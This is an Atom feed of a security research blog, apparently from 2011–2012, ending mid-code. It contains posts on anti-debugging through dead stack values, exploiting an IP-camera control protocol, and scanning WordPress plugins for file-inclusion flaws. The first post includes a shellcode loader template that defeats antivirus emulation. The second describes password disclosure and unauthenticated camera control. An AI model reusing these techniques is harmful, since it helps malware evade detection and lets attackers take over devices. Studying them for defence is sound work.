<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Spare Clock Cycles</title><link href="https://spareclockcycles.org/" rel="alternate"></link><link href="https://spareclockcycles.org/feeds/all.atom.xml" rel="self"></link><id>https://spareclockcycles.org/</id><updated>2012-02-14T06:23:00-05:00</updated><entry><title>Stack Necromancy: Defeating Debuggers By Raising the Dead</title><link href="https://spareclockcycles.org/2012/02/14/stack-necromancy-defeating-debuggers-by-raising-the-dead.html" rel="alternate"></link><updated>2012-02-14T06:23:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2012-02-14:2012/02/14/stack-necromancy-defeating-debuggers-by-raising-the-dead.html</id><summary type="html">&lt;p&gt;This article presupposes a basic understanding of how function calls and
stacks work. If you'd like to learn or need a refresher, Wikipedia is
always a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Call_stack"&gt;good place to start&lt;/a&gt;.&lt;/p&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Referencing uninitialized memory is a fairly common programming mistake
that can cause a variety of seemingly bizarre behaviors in otherwise
correct code. For the uninitiated, take a look at &lt;a class="reference external" href="https://www.securecoding.cert.org/confluence/display/seccode/EXP33-C.+Do+not+reference+uninitialized+memory"&gt;CERT's secure
coding guide&lt;/a&gt; for more info. Summarized, the core problem is that one
might reuse memory that has already been touched by the application.
Because that memory is not cleared automatically for performance
reasons, it must be explicitly set to an expected value or one risks
introducing unexpected behavior. Uninitialized memory references often
go unnoticed, as the code will work just fine if the uninitialized
memory doesn't contain an unfortunate value.&lt;/p&gt;
&lt;p&gt;Interesting, but what does this have to do with detecting debuggers?
Well, contrary to what many think, the value stored at a given
uninitialized address can actually be quite predictable, especially when
it comes to stack data. This is because the stack normally contains data
that was used in previous function calls. If the same series of
functions get called prior to a given function getting control, many of
the values stored on the dead stack will be identical between runs. What
this means is that if a debugger makes any changes whatsoever to a given
process's dead stack space by making any extra function calls before our
detection function gets run, an application should be able to detect
differences between the normal state and the debugged state.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-dead-live-again"&gt;
&lt;h2&gt;The Dead Live Again&lt;/h2&gt;
&lt;p&gt;Surely Windows wouldn't alter the stack when it's debugging a
process...this could cause unanticipated behavior, especially when
trying to debug uninitialized memory references! However, it appears
that the Windows debugging API does just that. The following is a
simplified version of the code I was writing when I first stumbled onto
this issue:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;quot;tlhelp32.h&amp;quot;
void dbgchk(){
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,0);
    //Comment out res=-1 for less magic
    DWORD res = -1;
    if(hSnapshot == INVALID_HANDLE_VALUE){
        printf(&amp;quot;Something bad happened&amp;quot;);
        return;
    }
    MODULEENTRY32 mod;
    if(!Module32First(hSnapshot,&amp;amp;mod)) {
        printf(&amp;quot;Debugger detected!&amp;quot;);
        CloseHandle(hSnapshot);
        return;
    }
    CloseHandle(hSnapshot);
    printf(&amp;quot;Not a debugger!&amp;quot;);
}

int main(){
    dbgchk();
    return 0;
}
&lt;/pre&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/snapdetect.tar.bz2"&gt;Code and executable&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When compiled using MinGW32 4.5.4 and run on Windows 7 32/64 bit, this
code should correctly detect the presence of a debugger.&lt;/p&gt;
&lt;p&gt;Let's look into what exactly is happening here. Upon first glance, it
may not appear that anything is too overtly wrong (besides the
uninitialized mod variable), and certainly nothing that seems like it
should detect the presence of a debugger. One might be tempted to think
that the API calls are trying to use some system functionality that
behaves differently when debugged, a technique that is already often
used in anti-reverse engineering. However, inspection in Olly reveals
that this is not the case. Something more subtle is happening here.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2012/02/kernel32_module32first_debugged.png"&gt;&lt;img alt="Ollydbg in Mod32First call" src="https://spareclockcycles.org/wp-content/uploads/2012/02/kernel32_module32first_debugged.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, when we first enter the Module32First function, checks
are performed on the mod variable, including one that checks the stack
address 0x0022fc84 (which points to dwSize of the MODULEENTRY32 struct
passed in) to see if it's greater than 0x243, the size of a
MODULEENTRY32 structure. If this check fails, the function returns an
error immediately. From the above stack state, this location is set to
0, and we know the check will fail. Because the check passes when we run
it without a debugger, we can assume that there must be a different
value stored at this address during normal operation. An appropriately
placed printf reveals that there is a stack address, 0x0022fd60, in
place of the 0 when run without the debugger, causing the function to
proceed as normal.&lt;/p&gt;
&lt;p&gt;I mentioned earlier that the state of the dead stack is dependent on the
functions that have run previously. This helps to explain why the stack
would be different when debugged versus not. Most (all?) debuggers on
Windows make extensive use of the debugging API during their normal
operation, given how easy it is to use and how much power it provides.
The debugger can attach to a process in two ways: it can attach at
process startup by passing the correct flags to CreateProcess, or it can
call DebugActiveProcess to attach to one that is already running. When
you open an executable directly in one of these debuggers, it will use
the CreateProcess method, and wait for a CREATE_PROCESS_DEBUG_EVENT
to occur. During this time, Windows calls all the necessary functions to
instantiate the process, and this includes setting up the necessary
debugging objects in the process space. Because of this, Windows behaves
differently when loading a debugged process than when it's not, and this
means (you guessed it!) different function calls, and different dead
stack values.&lt;/p&gt;
&lt;p&gt;Already, this looks like a rather interesting anti-debugging technique. I
haven't been able to find any previous description of this technique,
but it's entirely possible my Google-fu is just weak. I refer to it as
stack necromancy, given that it centers around the manipulation of
previously dead stack values. Defeating it automatically seems to
require foreknowledge of exactly how the dead stack should look to
an application, which is certainly a higher bar than, say, setting the
IsDebugged flag in the PEB to 0. If one can align the stack properly to
fail when making certain API calls while being debugged, but pass when
not, one can easily create some rather cryptic checks for the presence
of a debugger. Any API call that fails when certain values are passed to
it could potentially be used to trigger the detection.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="improving-our-spells"&gt;
&lt;h2&gt;Improving Our Spells&lt;/h2&gt;
&lt;p&gt;Now that we know we can detect the presence of a debugger, seemingly
trivially inside any number of API calls, what next?
A reverse engineer can just nop out the check once he finds where it is,
and, although it's more subtle than many checks, a dedicated person
would track it down. It would be nice if we could also make the entire
operation of an executable dependent on the differences in the stack.
There are two obvious ways to do this: use the previously shown tricks
to cause a large number of necessary API calls to fail during debugging
(for instance, by abusing LoadLibrary), or use values pulled off the
stack to encrypt various necessary values. Thankfully for us, the dead
stack is actually relatively stable, so we can do both. Both examples
are still relatively easy to patch, but they serve to show the kinds of
things one might do.&lt;/p&gt;
&lt;p&gt;Here's an example of some stack necromancy using the LoadLibrary API
call, a straightforward function that applications often call during
normal execution, and one whose failure would break the application:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

void dbgchk7(){
    char res[298];
    char lib[12] = &amp;quot;kernel32.dll&amp;quot;;
    if(LoadLibrary(lib)){
        printf(&amp;quot;Win 7: Not debugged!\n&amp;quot;);
        return;
    }
    printf(&amp;quot;Win 7: Debugged!\n&amp;quot;);
}

void dbgchkxp(){
    char res[53];
    char lib[12] = &amp;quot;kernel32.dll&amp;quot;;
    if(LoadLibrary(lib)){
        printf(&amp;quot;XP: Not debugged!\n&amp;quot;);
        return;
    }
    printf(&amp;quot;XP: Debugged!\n&amp;quot;);
}

BOOL chkxp(){
    UINT *ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfe0c);
    return ((*ptr)&amp;amp;0xff)==0x00;
}

int main(){
    //Detect OS first to avoid mangling dead stack
    if(chkxp())
        dbgchkxp();
    else
        dbgchk7();
    return 0;
}
&lt;/pre&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/loadlibrary_detect.tar.bz2"&gt;Code and
executable&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Take a minute to look at the above code. Once again, nothing about the
actual detection code seems like it should be able to tell whether an
application is being debugged or not. This code sample does, in fact,
exploit the same issue, but does it in a slightly different way. Rather
than making a length field fail a certain check, this code works by
omitting the null terminator for the string containing the module to be
loaded. This means the LoadLibrary call will fail or succeed depending
on the character immediately following the lib array. By placing the
array in a position on the stack that will have a different value stored
immediately after the string (null or otherwise), we can get the call to
behave differently when being debugged.&lt;/p&gt;
&lt;p&gt;To get this to work on both XP and Windows 7, I had to do two main
things: first, detect the OS without screwing up the stack, and second,
push the lib array to an appropriate place by adding local variables to
our chosen function. The OS detection is not strictly necessary in this
case, but it made my life easier, as the first LoadLibrary call will
significantly change the stack, making appropriate values more difficult
to find, and finding a single offset that works on both is a bit
frustrating. Normally, OS detection would be done through a Windows API
call, but we again want to have as small of a footprint as possible to
avoid messing up our stack. Instead, we can do it with the same
technique we're using to detect debugger presence, by simply grabbing a
chosen value off of the stack and checking if it matches an expected
value.&lt;/p&gt;
&lt;p&gt;The offsets used here were rather arbitrarily chosen, largely by
glancing over dumps of the stack state at the desired time while
debugged vs not. I have yet to come up with a good way to automate that
process, beyond a few stupid bits of code to print out portions of
the uninitialized stack. I have found that places higher up (lower
addresses) in the dead stack are more likely to be different, probably
because they are largely left over from process setup and are less
likely to have been overwritten by identical calls. However, the values
lower in the dead stack seem to be more stable, so there's a tradeoff
there. The nice thing about the approach is that there's no shortage of
possible values to choose from; you're bound to find suitable values for
what you want to do.&lt;/p&gt;
&lt;p&gt;Here is an example of using stack necromancy to pull encryption values
out of the stack graveyard, which causes the application to fail if it
is being debugged:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

UCHAR msg[] = &amp;quot;\x06\x30\x2b\x2c\x29\x62\x2f\x2d\x30\x27\x62\x2d\x34\x23\x2e\x36\x2b\x2c\x27\x6c&amp;quot;;
void print_results(UCHAR key){
    int i;
    for(i=0;i&amp;lt;20;i++)
       msg[i] = msg[i] ^ key;
    printf(&amp;quot;%s&amp;quot;, msg);
    printf(&amp;quot;\n\nWritten by supernothing, level 90 necromancer.\n&amp;quot;);

}

void decodemessage(){
    //Get base address
    UINT *ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfe0c);
    if(((*ptr)&amp;amp;0xff)==0x00){
        //WinXP 32bit
        ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfdc8);
        print_results(((((*ptr)&amp;amp;0xff0000)&amp;gt;&amp;gt;16)^0x83));
    } else {
        //Win7 32 bit and 64 bit
        ptr = (UINT *)((((UINT)&amp;amp;ptr) &amp;amp; 0x00FF0000)|0xfdd0);
        print_results(((*ptr)&amp;amp;0xff)^0xb6);
    }
}

int main(){
    decodemessage();
    return 0;
}
&lt;/pre&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/ovaltine.tar.bz2"&gt;Code and
executable&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;While this is a somewhat simple example (I doubt a single byte XOR key
is going to worry anyone), it serves to show that it is possible to
resurrect dead stack values and use them as encryption keys. This code
was tested on 32 bit Win XP and 32/64 bit Win 7 and will work correctly
when run normally, but will fail miserably when run in a debugger. In
this example, I simply find which system I'm running on and map the
appropriate byte to the correct key via an XOR. This one uses the same
hardcoded OS version check offset (0xfe0c) as our previous
example for convenience. It then pulls the appropriate value from known
stable addresses and uses it as a key. This same sort of code could
easily be used to generate a much larger key and be used with a decent
crypto algorithm.&lt;/p&gt;
&lt;p&gt;This technique is not only useful when it comes to debuggers, however:
it is arguably even more useful in defeating the dynamic code emulation
used by antivirus applications to try and detect packed code. AV
applications also make telltale changes to the stack space, which can
allow an attacker to prevent their code from being dynamically unpacked
in one of these environments. In a previous post, I talked about
&lt;a class="reference external" href="https://spareclockcycles.org/2010/11/27/avoiding-av-detection/"&gt;writing a simple crypter&lt;/a&gt; to bypass AV. In it, I used a timing attack
to defeat emulation. We can see from these VirusTotal results that
simply by using the same stack necromancy we used above, we can achieve
similar results: &lt;a class="reference external" href="https://www.virustotal.com/file/9ba6b7607efabc32e391e797df2cacd84a423049324d4af486dd84ed7e6503e4/analysis/1329216499/"&gt;without emulation defeat&lt;/a&gt; / &lt;a class="reference external" href="https://www.virustotal.com/file/c4b880d069be6107bde5b90ad3f781f7af7a562e311c4910b700af12d79f4d8a/analysis/1329216561/"&gt;with emulation defeat&lt;/a&gt;.
The detection by CAT-QuickHeal is based on a generic unpacking signature
which appears to center around large buffers being XORed, as it still
throws a detection when the shellcode is non-functional.&lt;/p&gt;
&lt;p&gt;Without defeat&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
UCHAR sc[] = YOUR_SHELLCODE_HERE;

UCHAR key;

int main(){
    key = 0x42;
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (unsigned char*)malloc(SC_LEN);

    for(i=0; i&amp;lt;SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }

    ((void (*)())tmp)();

    return 0;
}
&lt;/pre&gt;
&lt;p&gt;With defeat&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#include &amp;lt;windows.h&amp;gt;
UCHAR sc[] = YOUR_SHELLCODE_HERE;

UCHAR key;

void getdecodeinfo(){
    //Get base address
    UINT ptr = (((unsigned int)&amp;amp;ptr)&amp;amp;0x00FF0000)+0xfb1c;
    if(((*(unsigned int*)ptr)&amp;amp;0xff)==0x24){
        //WinXP 32bit
        key = ((((*(unsigned int*)ptr)&amp;amp;0xff00)&amp;gt;&amp;gt;8)^0x4e);
    } else {
        //Win7 32 bit and 64 bit
        key = ((*(unsigned int*)ptr)&amp;amp;0xff)^0x4a;
    }
}

int main(){
    getdecodeinfo();
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (unsigned char*)malloc(SC_LEN);

    for(i=0; i&amp;lt;SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }

    ((void (*)())tmp)();

    return 0;
}
&lt;/pre&gt;
&lt;p&gt;This particular class of defeats is especially nice, however, as it
can't be optimized out like many time-based ones, yet remains quite
generic and hard to detect with signatures. After all, many applications
inadvertently reference uninitialized memory. Triggering on that alone
could significantly increase false positives.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="machetes-are-your-friend"&gt;
&lt;h2&gt;Machetes Are Your Friend&lt;/h2&gt;
&lt;p&gt;Bypassing the techniques I've presented here is by no means impossible,
but they are an obstacle to reverse engineering. Because of the
generality of the technique, and the large number of ways to use it, a
&amp;quot;general&amp;quot; defeat would take some effort to develop. The best strategy I
have come up with so far is creating the process in a suspended state
without debugging it, dumping the stack state, re-running the
application in a debugged state, and writing the expected dead stack
into the process. Something along these lines *should* work, but I
have not tested any of it.&lt;/p&gt;
&lt;p&gt;Defeating single implementations, however, is definitely doable. The
main challenge, as alluded to above, is finding where the detection
happened. Malware is not going to be as kind to the reverse engineer as
my examples are. A sample very well might detect the debugger during
application startup, and then continue on its merry way until some point
in the future. Because of how subtle the check can be, and how many
different ways it could be used, it could be difficult to find the
offending memory accesses. Carefully inspecting each function for
accesses to uninitialized memory is probably too tedious to be feasible,
so automation in the form of memory analysis tools is likely a must.
There's a number of these tools for Windows, and most of them would
probably work. Once the check is found, it can be patched like most
other debug defeats. The exceptions are going to be examples that pull
values from the stack rather than just checking them. These will require
modifying the binary to print the value, and then running the code
without a debugger.&lt;/p&gt;
&lt;p&gt;The biggest concern for those performing stack necromancy is that
Microsoft or an AV company will intentionally attempt to mangle the call
sequence executed during application startup. This would be the obvious
response in my mind to prevent malicious software from using it. If this
happened, it would obviously render the application inoperative. For
this reason, it may make sense to fail more gracefully here than with
other techniques, falling back to an update mechanism of some kind to
receive a fix.&lt;/p&gt;
&lt;p&gt;As for defending against this technique in an AV's emulator, the only
real way I can see is to perfectly simulate the runtime environment of
the given process, down to the state of the empty stack. Unless you're
doing that, these kinds of defeats should always work. However, I would
love to see myself proved wrong.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="enough-for-today"&gt;
&lt;h2&gt;Enough For Today&lt;/h2&gt;
&lt;p&gt;Sadly, that's about all I have on the wonderful world of dead stacks for
this post. Due to the nature of the code that I've posted above, it
obviously may not work on your particular system. I've been pretty
thorough about testing it on various VMs and computers I have laying
around, but that definitely doesn't preclude it breaking elsewhere. I've
already identified a few things that can cause it to fail, namely
certain intrusive AV techniques such as DLL injection, as well as
differing OS versions. However, anything that affects the state of the
stack prior to the application's main being reached could potentially
disrupt it. If it's not working for you, feel free to let me know about
it (preferably with suggestions as to why it fails and/or cleverly
worded insults about my puny human brain).&lt;/p&gt;
&lt;p&gt;Hopefully, I have been able to demonstrate some of the very interesting
things that can be done by resurrecting dead stack values and using them
to do one's bidding. There are doubtless many more ways that people
could improve upon the techniques I have discussed here, and I look
forward to hearing about them. Happy hacking.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Exploiting an IP Camera Control Protocol: Redux</title><link href="https://spareclockcycles.org/2012/01/23/exploiting-an-ip-camera-control-protocol-redux.html" rel="alternate"></link><updated>2012-01-23T16:59:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2012-01-23:2012/01/23/exploiting-an-ip-camera-control-protocol-redux.html</id><summary type="html">&lt;p&gt;Last May, &lt;a class="reference external" href="https://spareclockcycles.org/2011/05/23/exploiting-an-ip-camera-control-protocol/"&gt;I wrote&lt;/a&gt; about a remote password disclosure vulnerability I
found in a proprietary protocol used to control ~150 different low-end
IP cameras. The exploit I wrote was tested on the &lt;a class="reference external" href="http://www.rosewill.com/products/1728/productDetail.htm"&gt;Rosewill RXS-3211&lt;/a&gt;,
a rebranded version of the &lt;a class="reference external" href="http://www.edimax.com/en/produce_detail.php?pd_id=352&amp;amp;pl1_id=8&amp;amp;pl2_id=91"&gt;Edimax IC3005&lt;/a&gt;. &amp;nbsp;The vulnerability remained
unpatched in the RXS-3211 until July of last year, when a supposed fix
was provided. Unfortunately, I've been busy working on other projects,
so I just recently got around to testing it. Spoiler: the results
weren't good. The following post documents how easy it is to still
exploit this particular vulnerability, alternative ways to exploit the
protocol, and how to create your own firmware images to run whatever you
want on devices that you now control.&lt;/p&gt;
&lt;div class="section" id="the-patch-is-0-1-effective"&gt;
&lt;h2&gt;The Patch Is 0.1% Effective&lt;/h2&gt;
&lt;p&gt;After flashing the latest firmware image to one of my cameras and
installing the new management application, I did exactly what I did the
first time: fired up Wireshark again and looked through the traffic. It
was clear from the dumps that they were at least obfuscating the traffic
now, but the sad fact remained that when I entered my password into the
client application, no traffic was sent to the server before I was
granted access. Clearly, authentication in the protocol is still
occurring client-side. Not good.&lt;/p&gt;
&lt;p&gt;With that knowledge, I thought it'd be fun to first explore what all one
can do without even having the admin password. Thankfully, this was much
easier than would be expected, given my fateful acquisition of Edimax's
implementation of the protocol. While working on creating custom
firmware images, I downloaded a number of GPL source packages released
by Edimax. In the IC3010 package, I realized that Edimax had included
more source code than normal, including one folder labeled
&amp;quot;enet_EDIMAX&amp;quot;. After a quick look, I realized I now had the source to
the protocol I had been reversing. Win.&lt;/p&gt;
&lt;p&gt;Rather than describing what one can do while unauthenticated, it would
probably be faster to describe what one *can't* do. Reboots, factory
resets, reading any and all device settings, performing WLAN surveys,
toggling LEDs...it is even possible to perform remote, unauthenticated
firmware flashing on some models. Basically, the only thing that isn't
possible is grabbing remote frames from the camera. You can read
through the code for yourself here: &lt;a class="reference external" href="http://pastebin.com/gALqkg8h"&gt;enet_agentd.h&lt;/a&gt;
&lt;a class="reference external" href="http://pastebin.com/Bb3bWZP5"&gt;enet_agentd.c&lt;/a&gt;. After some quick Python scripting, I confirmed that
all of the supported functions on the RXS-3211 were still vulnerable to
exploitation, even if the admin password was no longer in cleartext. If
anyone reading has one of the cameras that supports wireless or firmware
flashing (IC-1000, maybe others), I'd love to see if the other enet
functionality works.&lt;/p&gt;
&lt;p&gt;Obviously, the patch wasn't very effective. However, for the sake
of curiosity and thoroughness, I wanted to see if it was still possible
to recover the admin password. To do so meant figuring out how the
traffic was being encoded and whether it could be defeated. The header
format I described in my previous post was still intact, but the body
was obviously scrambled somehow. While this could have required a
serious reverse engineering effort, it turned out to be fairly simple.&lt;/p&gt;
&lt;p&gt;In such situations, there's only a few options: encryption, compression,
or both. After changing the password on the device a few times and
observing how the traffic changed, it became obvious that either very
weak encryption was being used or the data was compressed, as there was
an easily discernible pattern between the input text and the output.
Comparing the passwords &amp;quot;1111111111&amp;quot; and &amp;quot;1234567890&amp;quot;, it became clear
that compression was the winner: packets with the former
password were a few bytes shorter than those with the latter. Compression
algorithms often work by shrinking 'runs' of data in some way, and
hence, will compress the same character in succession much more
efficiently than different ones. To find out which algorithm, I then
went back and ran strings on the management executable, which gave me my
answer: zlib compression. Yes...their solution to remote password
disclosure was to compress the password before sending it. Brilliant.
After this, all it took was a single line of Python to make things work
perfectly again: zlib.decompress(data[12:-4],-15).&lt;/p&gt;
&lt;p&gt;To demonstrate these vulnerabilities, I threw together a simple Python
script: &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/enet_pwn.py"&gt;enet_pwn.py&lt;/a&gt;. With this, an attacker can disclose the admin
password and others stored on all devices using the enet protocol
(including the &amp;quot;patched&amp;quot; RXS-3211), grab many of the common settings
shared between devices, and perform reboots and factory resets on the
cameras. Obligatory disclaimer: I am not responsible for any illegal use
of this tool.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="going-further"&gt;
&lt;h2&gt;Going Further&lt;/h2&gt;
&lt;p&gt;For all the vulnerabilities I've pointed out in their software, I still
really like the Edimax cameras for their low cost and high
&amp;quot;hackability&amp;quot;. Creating firmware images for the devices can allow you to do
some cool things other cameras can't, and for ~30 dollars for the low
end ones, it's a pretty good deal. In fact, the first time I bought one,
I had actually considered turning it into a poor man's pentesting drop
box (which it does quite well). However, because of how easy it is to
create firmware images for the cameras, attackers can also install
anything they like once they obtain the admin password. This could allow
them to gain further unauthorized access to a network.&lt;/p&gt;
&lt;p&gt;While creating custom firmware for these cameras is a little more
complicated than simply using the &lt;a class="reference external" href="https://code.google.com/p/firmware-mod-kit/"&gt;firmware mod kit&lt;/a&gt;, it isn't by much.
I've created a &lt;a class="reference external" href="https://code.google.com/p/edimax-ipcam-fw/source/checkout"&gt;few basic scripts that handle everything&lt;/a&gt;, which
basically just automate the process &lt;a class="reference external" href="http://www.suborbital.org.uk/canofworms/index.php?/archives/3-Getting-telnet-access-on-an-Edimax-IC3010-webcam.html"&gt;described here&lt;/a&gt;. All someone needs
to do is use the extract_edimax.sh script to extract the image, modify
the root filesystem to their liking, and then recompile with the
build_edimax.sh script. Edimax provides a toolchain for compiling your
own applications, which can also be found in my repository in the tools
directory. For me, getting netcat on there was enough for everything I
wanted. I should note though that any flashing you do could damage your
device, so be careful. It is usually possible to recover through a
serial terminal on the device, but it's best to avoid that
annoyance.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mitigation"&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;For end users, the easiest thing to do is simply to block incoming UDP
packets on port 13364. It's possible to make your own firmware image
that isn't vulnerable, but this is left as an exercise for the reader
(or possibly a later post).&lt;/p&gt;
&lt;p&gt;For the developers, here is, once again, some possible pseudocode for
the server:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
if discovery request:
    allow
else if any other valid request encrypted with admin password hash:
    allow
else:
    deny deny deny
&lt;/pre&gt;
&lt;p&gt;Never send cleartext passwords. Don't even send hashes unless you have
to. And definitely don't send them to clients. It's not that
complicated. If you can't do that much, you shouldn't be rolling your
own protocols.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Explo(it|r)ing the Wordpress Extension Repos</title><link href="https://spareclockcycles.org/2011/09/18/exploitring-the-wordpress-extension-repos.html" rel="alternate"></link><updated>2011-09-18T01:03:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-09-18:2011/09/18/exploitring-the-wordpress-extension-repos.html</id><summary type="html">&lt;p&gt;Today's post is kind of long, so I thought I should warn you in advance
by adding an additional paragraph for you to read. I also wanted to
provide download links for those who'd rather just read the code. It
isn't the cleanest code in the world, so I apologize in advance. I
discuss what all of these are for and how they work later on in the
post, so if you're confused and/or curious, read on. Downloads:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Copies of the Wordpress theme and plugin repositories can be grabbed
via &lt;a class="reference external" href="https://spareclockcycles.org/downloads/wordpress_repos.torrent"&gt;torrent&lt;/a&gt; (Please note that the plugin repo has a few
directories incomplete/missing; this can be fixed by running my
checkout code)&lt;/li&gt;
&lt;li&gt;A new Wordpress plugin fingerprinting tool, &lt;a class="reference external" href="http://code.google.com/p/wpfinger/"&gt;wpfinger&lt;/a&gt;
(&lt;a class="reference external" href="http://code.google.com/p/wpfinger/downloads/detail?name=wpfinger-v0.1.1.tar.bz2"&gt;download&lt;/a&gt;). This tool can infer detailed version information on
just about every plugin in the Wordpress repository. This package
also contains some useful libraries for checking out the repositories
and scraping plugin rankings, as this is used in the fingerprinting
tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="section" id="intro"&gt;
&lt;h2&gt;Intro&lt;/h2&gt;
&lt;p&gt;After finding an &lt;a class="reference external" href="https://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/"&gt;arbitrary file upload vulnerability in 1 Flash
Gallery&lt;/a&gt;, I became curious as to how many other Wordpress plugins made
basic security mistakes. The root of the 1 Flash Gallery issue, it seems, is
that its developers CTRL-C-V'd code from a project called &lt;a class="reference external" href="http://www.uploadify.com/"&gt;Uploadify&lt;/a&gt;, which has
been known to be vulnerable &lt;a class="reference external" href="http://osvdb.org/62653"&gt;for quite a while&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;After realizing this, I wondered how many plugins make
easy-to-spot security mistakes, such as reusing vulnerable libraries or
doing things like include($_REQUEST['lulz']). However, my curiosity was
initially somewhat hampered by the fact that downloading and auditing
every Wordpress plugin one at a time is not only a mind-numbing task,
but a Herculean one as well. And, well, I'm incredibly lazy.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-the-repos"&gt;
&lt;h2&gt;Getting the Repos&lt;/h2&gt;
&lt;p&gt;So what to do? Well, it turns out that Wordpress is nice enough to have
public repositories (&lt;a class="reference external" href="http://plugins.svn.wordpress.org"&gt;http://plugins.svn.wordpress.org&lt;/a&gt; and
&lt;a class="reference external" href="http://themes.svn.wordpress.org"&gt;http://themes.svn.wordpress.org&lt;/a&gt;) containing all plugins that have ever
been submitted, as well as every theme. &amp;nbsp;This, of course, was exciting:
I could just check this out, whip out some grep-fu, and have my answers.&lt;/p&gt;
&lt;p&gt;Alright, so maybe it isn't as simple as that. First, the plugin repo is
huge: as is, it's taking up a good 80GB on one of my disks and contains
approximately 12,000,000 files, thanks in no small part to subversion's
insistence on creating ridiculous numbers of internal files. This isn't
all that surprising, however, given that the repo contains ~23,000
plugins.&lt;/p&gt;
&lt;p&gt;As I found out in my initial failed attempts to grab the code, checking
this out all at once with subversion is, as far as I can tell,
impossible. After about 15-20 minutes of downloading, the checkout would
error out, and I'd have to wait for SVN to reverify everything it had
already gotten. This got old quickly, so I came up with a hacky
workaround: I wrote a quick script that simply checked out the
individual repositories for every plugin and theme. Not very clean, but
for my purposes, effective. A little over a day later, I had all the
themes and plugins, and it was time for some fun.&lt;/p&gt;
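&lt;p&gt;My actual script isn't reproduced here, but the approach can be sketched in a few lines of Python (the repo URL is real; the helper names are mine):&lt;/p&gt;

```python
import subprocess

REPO = "http://plugins.svn.wordpress.org"

def checkout_commands(plugin_names, repo=REPO):
    """One 'svn co' command per plugin, so a failed checkout only loses
    that one plugin rather than the whole 80GB working copy."""
    return [["svn", "co", "%s/%s/" % (repo, name), name]
            for name in plugin_names]

def checkout_all(repo=REPO):
    # 'svn ls' on the repo root prints one line per plugin directory.
    listing = subprocess.check_output(["svn", "ls", repo + "/"]).decode()
    names = [line.rstrip("/") for line in listing.splitlines() if line.strip()]
    for cmd in checkout_commands(names):
        subprocess.call(cmd)  # no retry logic; re-running resumes cheaply
```

&lt;p&gt;Checking out each plugin as its own working copy means a dropped connection only costs you that plugin, and re-running the script skips what's already there.&lt;/p&gt;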
&lt;p&gt;A side note: for those of you who would like to play with either of
these, I'd recommend &lt;a class="reference external" href="https://spareclockcycles.org/downloads/wordpress_repos.torrent"&gt;grabbing the torrent&lt;/a&gt;, extracting it, and then
running my checkout script in wpfinger in the directory above them. This
will still get you the latest versions of all the plugins, but should
take significantly less time and put less strain on everyone's servers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="attack"&gt;
&lt;h2&gt;Attack&lt;/h2&gt;
&lt;p&gt;Anyway, on to the vulnerabilities. During my scans I found remote
unauthenticated code execution vulnerabilities in 36 plugins, varying in
popularity from ~250 downloads to ~60,000. Finding them took essentially
no effort or skill on my part, just patience.&lt;/p&gt;
&lt;p&gt;The following eleven plugins were found entirely with grep and a little
bit of manual inspection. Instead of running over every PHP file in the
repo, I sped things up by only running over code in the trunk
directories, on the assumption that trunk should hold the latest code.
Pretty much all of these were found analyzing results from
the same grep:&lt;/p&gt;
&lt;p&gt;Grep used: &lt;tt class="docutils literal"&gt;egrep -i
'(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)'&lt;/tt&gt;&lt;/p&gt;
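&lt;p&gt;If you'd rather not shell out to egrep, the same search is easy to reproduce in Python; this is just a sketch of the idea, not the code I actually ran:&lt;/p&gt;

```python
import os
import re

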